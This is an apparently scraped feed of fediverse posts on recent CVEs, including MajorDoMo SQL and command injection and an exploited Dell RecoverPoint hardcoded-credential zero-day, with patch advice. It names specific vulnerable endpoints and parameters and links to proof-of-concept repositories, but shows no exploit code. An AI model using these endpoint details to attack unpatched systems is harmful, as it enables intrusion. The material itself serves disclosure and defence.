updated 2026-02-18T22:16:25.967000

2 posts

MajorDoMo (aka Major Domestic Module) contains an unauthenticated SQL injection vulnerability in the commands module. The commands_search.inc.php file directly interpolates the $_GET['parent'] parameter into multiple SQL queries without sanitization or parameterized queries. The commands module is loadable without authentication via the /objects/?module=commands endpoint, which includes arbitrary

thehackerwire@mastodon.social at 2026-02-18T22:34:40.000Z ##

🟠 CVE-2026-27179 - High (8.2)

MajorDoMo (aka Major Domestic Module) contains an unauthenticated SQL injection vulnerability in the commands module. The commands_search.inc.php file directly interpolates the $_GET['parent'] parameter into multiple SQL queries without sanitizati...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T22:34:40.000Z ##

🟠 CVE-2026-27179 - High (8.2)

MajorDoMo (aka Major Domestic Module) contains an unauthenticated SQL injection vulnerability in the commands module. The commands_search.inc.php file directly interpolates the $_GET['parent'] parameter into multiple SQL queries without sanitizati...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27175
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-18T22:16:25.263000

4 posts

MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated OS command injection via rc/index.php. The $param variable from user input is interpolated into a command string within double quotes without sanitization via escapeshellarg(). The command is inserted into a database queue by safe_exec(), which performs no sanitization. The cycle_execs.php script, which is web-accessible withou

offseq at 2026-02-18T23:00:13.970Z ##

MajorDoMo (all versions) faces a CRITICAL OS command injection (CVE-2026-27175, CVSS 9.2). Unauthenticated RCE via rc/index.php & cycle_execs.php. No patch yet — restrict endpoints, sanitize input, and monitor activity! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-18T22:19:42.000Z ##

🔴 CVE-2026-27175 - Critical (9.8)

MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated OS command injection via rc/index.php. The $param variable from user input is interpolated into a command string within double quotes without sanitization via escapeshellarg()....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-18T23:00:13.000Z ##

MajorDoMo (all versions) faces a CRITICAL OS command injection (CVE-2026-27175, CVSS 9.2). Unauthenticated RCE via rc/index.php & cycle_execs.php. No patch yet — restrict endpoints, sanitize input, and monitor activity! radar.offseq.com/threat/cve-20 #OffSeq #CVE202627175 #Infosec

##

thehackerwire@mastodon.social at 2026-02-18T22:19:42.000Z ##

🔴 CVE-2026-27175 - Critical (9.8)

MajorDoMo (aka Major Domestic Module) is vulnerable to unauthenticated OS command injection via rc/index.php. The $param variable from user input is interpolated into a command string within double quotes without sanitization via escapeshellarg()....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27174
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-18T22:16:25.080000

4 posts

MajorDoMo (aka Major Domestic Module) allows unauthenticated remote code execution via the admin panel's PHP console feature. An include order bug in modules/panel.class.php causes execution to continue past a redirect() call that lacks an exit statement, allowing unauthenticated requests to reach the ajax handler in inc_panel_ajax.php. The console handler within that file passes user-supplied inp

offseq at 2026-02-19T00:00:40.787Z ##

🔴 CRITICAL: CVE-2026-27174 in MajorDoMo enables unauth RCE via vulnerable PHP handler — no user interaction needed. Full system compromise possible. Restrict panel access, patch, & monitor logs. Details: radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-18T22:19:33.000Z ##

🔴 CVE-2026-27174 - Critical (9.8)

MajorDoMo (aka Major Domestic Module) allows unauthenticated remote code execution via the admin panel's PHP console feature. An include order bug in modules/panel.class.php causes execution to continue past a redirect() call that lacks an exit st...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-19T00:00:40.000Z ##

🔴 CRITICAL: CVE-2026-27174 in MajorDoMo enables unauth RCE via vulnerable PHP handler — no user interaction needed. Full system compromise possible. Restrict panel access, patch, & monitor logs. Details: radar.offseq.com/threat/cve-20 #OffSeq #CVE202627174 #RCE #HomeAutomation #Infosec

##

thehackerwire@mastodon.social at 2026-02-18T22:19:33.000Z ##

🔴 CVE-2026-27174 - Critical (9.8)

MajorDoMo (aka Major Domestic Module) allows unauthenticated remote code execution via the admin panel's PHP console feature. An include order bug in modules/panel.class.php causes execution to continue past a redirect() call that lacks an exit st...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1435
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-18T21:32:25

4 posts

Not properly invalidated session vulnerability in Graylog Web Interface, version 2.2.3, due to incorrect management of session invalidation after new logins. The application generates a new 'sessionId' each time a user authenticates, but does not invalidate previously issued session identifiers, which remain valid even after multiple consecutive logins by the same user. As a result, a stolen or le

thehackerwire@mastodon.social at 2026-02-18T20:24:17.000Z ##

🔴 CVE-2026-1435 - Critical (9.8)

Not properly invalidated session vulnerability in Graylog Web Interface, version 2.2.3, due to incorrect management of session invalidation after new logins. The application generates a new 'sessionId' each time a user authenticates, but does not ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq at 2026-02-18T17:00:30.030Z ##

⚠️ CVE-2026-1435 (CRITICAL): Graylog Web Interface 2.2.3 fails to expire old sessions, enabling token reuse & unauthorized access. Restrict access, enable MFA, and monitor sessions until patch is released. Details: radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-18T20:24:17.000Z ##

🔴 CVE-2026-1435 - Critical (9.8)

Not properly invalidated session vulnerability in Graylog Web Interface, version 2.2.3, due to incorrect management of session invalidation after new logins. The application generates a new 'sessionId' each time a user authenticates, but does not ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-18T17:00:30.000Z ##

⚠️ CVE-2026-1435 (CRITICAL): Graylog Web Interface 2.2.3 fails to expire old sessions, enabling token reuse & unauthorized access. Restrict access, enable MFA, and monitor sessions until patch is released. Details: radar.offseq.com/threat/cve-20 #OffSeq #Graylog #Vuln #Security

##

CVE-2025-1272
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T21:31:34

2 posts

The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above for Fedora Linux has the lockdown mode disabled without any warning. This may allow an attacker to gain access to sensitive information such kernel memory mappings, I/O ports, BPF and kprobes. Additionally unsigned modules can be loaded, leading to execution of untrusted code breaking breaking any Secure Boot protection.

2 repos

https://github.com/d0n601/CVE-2025-12720

https://github.com/d0n601/CVE-2025-12721

thehackerwire@mastodon.social at 2026-02-18T21:59:46.000Z ##

🟠 CVE-2025-1272 - High (7.7)

The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above for Fedora Linux has the lockdown mode disabled without any warning. This may allow an attacker to gain access to sensitive information such kernel memory mappings, I/O ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T21:59:46.000Z ##

🟠 CVE-2025-1272 - High (7.7)

The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above for Fedora Linux has the lockdown mode disabled without any warning. This may allow an attacker to gain access to sensitive information such kernel memory mappings, I/O ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0875
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T21:31:34

2 posts

A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-18T20:23:53.000Z ##

🟠 CVE-2026-0875 - High (7.8)

A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T20:23:53.000Z ##

🟠 CVE-2026-0875 - High (7.8)

A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70064
(8.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T21:31:23

2 posts

PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulnerability. A low-privileged user (Patient) can directly access the Administrator Dashboard and all sub-modules (e.g., User Logs, Doctor Management) by manually browsing to the /admin/ directory after authentication. This allows any self-registered user to takeover the application, view confidential logs, and modify syst

thehackerwire@mastodon.social at 2026-02-18T20:24:02.000Z ##

🟠 CVE-2025-70064 - High (8.8)

PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulnerability. A low-privileged user (Patient) can directly access the Administrator Dashboard and all sub-modules (e.g., User Logs, Doctor Management) by manually browsing...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T20:24:02.000Z ##

🟠 CVE-2025-70064 - High (8.8)

PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulnerability. A low-privileged user (Patient) can directly access the Administrator Dashboard and all sub-modules (e.g., User Logs, Doctor Management) by manually browsing...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70147
(7.5 HIGH)

EPSS: 0.00%

updated 2026-02-18T21:31:23

2 posts

Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests to these endpoints without a valid session.

thehackerwire@mastodon.social at 2026-02-18T19:37:03.000Z ##

🟠 CVE-2025-70147 - High (7.5)

Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T19:37:03.000Z ##

🟠 CVE-2025-70147 - High (7.5)

Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65717
(4.3 MEDIUM)

EPSS: 0.03%

updated 2026-02-18T21:16:21.480000

6 posts

An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.

jbhall56 at 2026-02-18T13:43:08.593Z ##

The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). bleepingcomputer.com/news/secu

##

thehackerwire@mastodon.social at 2026-02-17T16:12:42.000Z ##

🔴 CVE-2025-65717 - Critical (9.1)

An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:02:04.000Z ##

🔴 CVE-2025-65717 - Critical (9.1)

An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

jbhall56@infosec.exchange at 2026-02-18T13:43:08.000Z ##

The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). bleepingcomputer.com/news/secu

##

thehackerwire@mastodon.social at 2026-02-17T16:12:42.000Z ##

🔴 CVE-2025-65717 - Critical (9.1)

An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:02:04.000Z ##

🔴 CVE-2025-65717 - Critical (9.1)

An issue in Visual Studio Code Extensions Live Server v5.7.9 allows attackers to exfiltrate files via user interaction with a crafted HTML page.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0874
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T20:18:32.193000

2 posts

A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.

thehackerwire@mastodon.social at 2026-02-18T20:23:43.000Z ##

🟠 CVE-2026-0874 - High (7.8)

A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T20:23:43.000Z ##

🟠 CVE-2026-0874 - High (7.8)

A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-14009
(10.0 CRITICAL)

EPSS: 0.00%

updated 2026-02-18T20:18:31.207000

4 posts

A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assu

thehackerwire@mastodon.social at 2026-02-18T19:02:11.000Z ##

🔴 CVE-2025-14009 - Critical (10)

A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows atta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T19:00:01.000Z ##

🔴 CVE-2025-14009 - Critical (10)

A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows atta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T19:02:11.000Z ##

🔴 CVE-2025-14009 - Critical (10)

A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows atta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T19:00:01.000Z ##

🔴 CVE-2025-14009 - Critical (10)

A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows atta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22769
(10.0 CRITICAL)

EPSS: 0.07%

updated 2026-02-18T20:01:15.983000

26 posts

Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a hardcoded credential vulnerability. This is considered critical as an unauthenticated remote attacker with knowledge of the hardcoded credential could potentially exploit this vulnerability leading to unauthorized access to the underlying operating system and root-level persistence. Dell recommends that customers upgr

niztal@mastodon.social at 2026-02-18T23:39:58.000Z ##

⚠️ Dell RecoverPoint for VMs Zero-Day CVE-2026-22769 Exploited Since Mid-2024

thehackernews.com/2026/02/dell

#CyberSecurity #InfoSec

##

nemo@mas.to at 2026-02-18T22:10:58.000Z ##

Dell warns of a max-severity flaw (CVE-2026-22769) in RecoverPoint for VMs, already exploited for root access in the wild. 🔓💻 Security teams are urged to patch or apply mitigations immediately. Details: cyberinsider.com/dell-warns-of #cybersecurity #infosec #Dell #Newz

##

oversecurity@mastodon.social at 2026-02-18T21:20:05.000Z ##

Fed agencies ordered to patch Dell bug by Saturday after exploitation warning

Dell and Google released notices on Tuesday about CVE-2026-22769, warning that a sophisticated Chinese actor has been targeting the bug since at...

🔗️ [Therecord] link.is.it/stSZK0

##

thefinancialstandard@mastodon.social at 2026-02-18T19:00:07.000Z ##

Critical Dell RecoverPoint Exploit Exposed Since 2024

A zero-day Dell RecoverPoint exploit, CVE-2026-22769, has been actively exploited since mid-2024. Patch immediately to avoid data breaches.

Read more: thefinancialstandard.com/dell-

#finance #cybersecurity #fintech #news

##

beyondmachines1 at 2026-02-18T18:01:24.344Z ##

Hackers Exploit Dell RecoverPoint Zero-Day to Deploy Stealthy Backdoor

A critical flaw in Dell RecoverPoint for Virtual Machines (CVE-2026-22769) is actively exploited by threat actor using hard-coded credentials to deploy backdoors.

**If you are using Dell RecoverPoint, this is important! Check your Dell RecoverPoint versions and plan a very quick update to 6.0.3.1 HF1 patch to remove the hard-coded admin credentials. Ensure these appliances are isolated from the internet.**

beyondmachines.net/event_detai

##

cisakevtracker@mastodon.social at 2026-02-18T17:01:12.000Z ##

CVE ID: CVE-2026-22769
Vendor: Dell
Product: RecoverPoint for Virtual Machines (RP4VMs)
Date Added: 2026-02-18
Notes: dell.com/support/kbdoc/en-us/0 ; dell.com/support/kbdoc/en-us/0 ; cloud.google.com/blog/topics/t ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

rxerium at 2026-02-18T13:41:47.655Z ##

🚨 Mandiant have identified zero-day exploitation of a high-risk vulnerability in Dell RecoverPoint for Virtual Machines, tracked as CVE-2026-22769.

RecoverPoint can be detected using this Nuclei template:
github.com/projectdiscovery/nu

Very limited exposure to the internet.

Dell recommends upgrading to version 6.0.3.1 HF1 or later. Mitigations are also available.

Mandiant report:
cloud.google.com/blog/topics/t

##

undercodenews@mastodon.social at 2026-02-18T13:31:49.000Z ##

China-Linked APT Exploits Critical Dell RecoverPoint Zero-Day for Over a Year + Video

Introduction In a stark warning to enterprise security teams, researchers from Mandiant and Google’s Threat Intelligence Group (GTIG) have revealed that a China-linked advanced persistent threat (APT) group quietly exploited a severe zero-day vulnerability in Dell RecoverPoint for Virtual Machines since mid-2024. The flaw, now tracked as CVE-2026-22769, carries the highest severity…

undercodenews.com/china-linked

##

jbhall56 at 2026-02-18T13:17:28.416Z ##

The activity involves the exploitation of CVE-2026-22769 (CVSS score: 10.0), a case of hard-coded credentials affecting versions prior to 6.0.3.1 HF1. Other products, including RecoverPoint Classic, are not vulnerable to the flaw. thehackernews.com/2026/02/dell

##

cyberveille@mastobot.ping.moi at 2026-02-18T07:30:07.000Z ##

📢 Zero‑day critique sur Dell RecoverPoint for VMs (CVE-2026-22769) exploitée par UNC6201 avec le backdoor GRIMBOLT
📝 Sel...
📖 cyberveille : cyberveille.ch/posts/2026-02-1
🌐 source : cloud.google.com/blog/topics/t
#CVE_2026_22769 #Dell_RecoverPoint_for_Virtual_Machines #Cyberveille

##

oversecurity@mastodon.social at 2026-02-18T07:10:09.000Z ##

Zero-Day in Dell RecoverPoint Exploited by Chinese Hacker Group

A critical zero-day vulnerability, tracked as CVE-2026-22769, is being actively exploited in Dell Technologies’ RecoverPoint for Virtual Machines....

🔗️ [Thecyberexpress] link.is.it/FOr0Id

##

offseq at 2026-02-18T06:00:27.047Z ##

CRITICAL: CVE-2026-22769 in Dell RecoverPoint for VMs (≤5.3 SP4 P1) lets unauthenticated attackers gain root via hardcoded creds. Patch or mitigate ASAP! 🛡️ radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T20:23:32.000Z ##

🔴 CVE-2026-22769 - Critical (10)

Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a hardcoded credential vulnerability. This is considered critical as an unauthenticated remote attacker with knowledge of the hardcoded credential could potentially exp...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL at 2026-02-17T19:44:30.485Z ##

New.

Mandiant:From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day cloud.google.com/blog/topics/t

Dell posted an update on February 11:

Critical: CVE-2026-22769: Security Update for RecoverPoint for Virtual Machines Hardcoded Credential Vulnerability dell.com/support/kbdoc/en-us/0

@neurovagrant

##

nemo@mas.to at 2026-02-18T22:10:58.000Z ##

Dell warns of a max-severity flaw (CVE-2026-22769) in RecoverPoint for VMs, already exploited for root access in the wild. 🔓💻 Security teams are urged to patch or apply mitigations immediately. Details: cyberinsider.com/dell-warns-of #cybersecurity #infosec #Dell #Newz

##

oversecurity@mastodon.social at 2026-02-18T21:20:05.000Z ##

Fed agencies ordered to patch Dell bug by Saturday after exploitation warning

Dell and Google released notices on Tuesday about CVE-2026-22769, warning that a sophisticated Chinese actor has been targeting the bug since at...

🔗️ [Therecord] link.is.it/stSZK0

##

thefinancialstandard@mastodon.social at 2026-02-18T19:00:07.000Z ##

Critical Dell RecoverPoint Exploit Exposed Since 2024

A zero-day Dell RecoverPoint exploit, CVE-2026-22769, has been actively exploited since mid-2024. Patch immediately to avoid data breaches.

Read more: thefinancialstandard.com/dell-

#finance #cybersecurity #fintech #news

##

beyondmachines1@infosec.exchange at 2026-02-18T18:01:24.000Z ##

Hackers Exploit Dell RecoverPoint Zero-Day to Deploy Stealthy Backdoor

A critical flaw in Dell RecoverPoint for Virtual Machines (CVE-2026-22769) is actively exploited by threat actor using hard-coded credentials to deploy backdoors.

**If you are using Dell RecoverPoint, this is important! Check your Dell RecoverPoint versions and plan a very quick update to 6.0.3.1 HF1 patch to remove the hard-coded admin credentials. Ensure these appliances are isolated from the internet.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

cisakevtracker@mastodon.social at 2026-02-18T17:01:12.000Z ##

CVE ID: CVE-2026-22769
Vendor: Dell
Product: RecoverPoint for Virtual Machines (RP4VMs)
Date Added: 2026-02-18
Notes: dell.com/support/kbdoc/en-us/0 ; dell.com/support/kbdoc/en-us/0 ; cloud.google.com/blog/topics/t ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

rxerium@infosec.exchange at 2026-02-18T13:41:47.000Z ##

🚨 Mandiant have identified zero-day exploitation of a high-risk vulnerability in Dell RecoverPoint for Virtual Machines, tracked as CVE-2026-22769.

RecoverPoint can be detected using this Nuclei template:
github.com/projectdiscovery/nu

Very limited exposure to the internet.

Dell recommends upgrading to version 6.0.3.1 HF1 or later. Mitigations are also available.

Mandiant report:
cloud.google.com/blog/topics/t

##

jbhall56@infosec.exchange at 2026-02-18T13:17:28.000Z ##

The activity involves the exploitation of CVE-2026-22769 (CVSS score: 10.0), a case of hard-coded credentials affecting versions prior to 6.0.3.1 HF1. Other products, including RecoverPoint Classic, are not vulnerable to the flaw. thehackernews.com/2026/02/dell

##

cyberveille@mastobot.ping.moi at 2026-02-18T07:30:07.000Z ##

📢 Zero‑day critique sur Dell RecoverPoint for VMs (CVE-2026-22769) exploitée par UNC6201 avec le backdoor GRIMBOLT
📝 Sel...
📖 cyberveille : cyberveille.ch/posts/2026-02-1
🌐 source : cloud.google.com/blog/topics/t
#CVE_2026_22769 #Dell_RecoverPoint_for_Virtual_Machines #Cyberveille

##

oversecurity@mastodon.social at 2026-02-18T07:10:09.000Z ##

Zero-Day in Dell RecoverPoint Exploited by Chinese Hacker Group

A critical zero-day vulnerability, tracked as CVE-2026-22769, is being actively exploited in Dell Technologies’ RecoverPoint for Virtual Machines....

🔗️ [Thecyberexpress] link.is.it/FOr0Id

##

offseq@infosec.exchange at 2026-02-18T06:00:27.000Z ##

CRITICAL: CVE-2026-22769 in Dell RecoverPoint for VMs (≤5.3 SP4 P1) lets unauthenticated attackers gain root via hardcoded creds. Patch or mitigate ASAP! 🛡️ radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #Dell #InfoSec

##

thehackerwire@mastodon.social at 2026-02-17T20:23:32.000Z ##

🔴 CVE-2026-22769 - Critical (10)

Dell RecoverPoint for Virtual Machines, versions prior to 6.0.3.1 HF1, contain a hardcoded credential vulnerability. This is considered critical as an unauthenticated remote attacker with knowledge of the hardcoded credential could potentially exp...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-02-17T19:44:30.000Z ##

New.

Mandiant:From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day cloud.google.com/blog/topics/t

Dell posted an update on February 11:

Critical: CVE-2026-22769: Security Update for RecoverPoint for Virtual Machines Hardcoded Credential Vulnerability dell.com/support/kbdoc/en-us/0 #infosec #Google #Dell #zeroday

@neurovagrant

##

CVE-2025-70149
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-18T19:21:43.090000

2 posts

CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.

thehackerwire@mastodon.social at 2026-02-18T19:37:12.000Z ##

🔴 CVE-2025-70149 - Critical (9.8)

CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T19:37:12.000Z ##

🔴 CVE-2025-70149 - Critical (9.8)

CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70146
(9.1 CRITICAL)

EPSS: 0.00%

updated 2026-02-18T19:21:42.767000

2 posts

Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via direct HTTP requests to affected endpoints without a valid session.

thehackerwire@mastodon.social at 2026-02-18T19:37:42.000Z ##

🔴 CVE-2025-70146 - Critical (9.1)

Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via d...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T19:37:42.000Z ##

🔴 CVE-2025-70146 - Critical (9.1)

Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via d...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2021-22175
(9.8 CRITICAL)

EPSS: 52.88%

updated 2026-02-18T18:31:26

4 posts

When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is disabled

Nuclei template

darses@mastodon.nl at 2026-02-18T19:35:54.000Z ##

Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.

#cybersecurity #vulnerability #circus

##

cisakevtracker@mastodon.social at 2026-02-18T17:00:56.000Z ##

CVE ID: CVE-2021-22175
Vendor: GitLab
Product: GitLab
Date Added: 2026-02-18
Notes: gitlab.com/gitlab-org/cves/-/b ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

darses@mastodon.nl at 2026-02-18T19:35:54.000Z ##

Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.

#cybersecurity #vulnerability #circus

##

cisakevtracker@mastodon.social at 2026-02-18T17:00:56.000Z ##

CVE ID: CVE-2021-22175
Vendor: GitLab
Product: GitLab
Date Added: 2026-02-18
Notes: gitlab.com/gitlab-org/cves/-/b ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

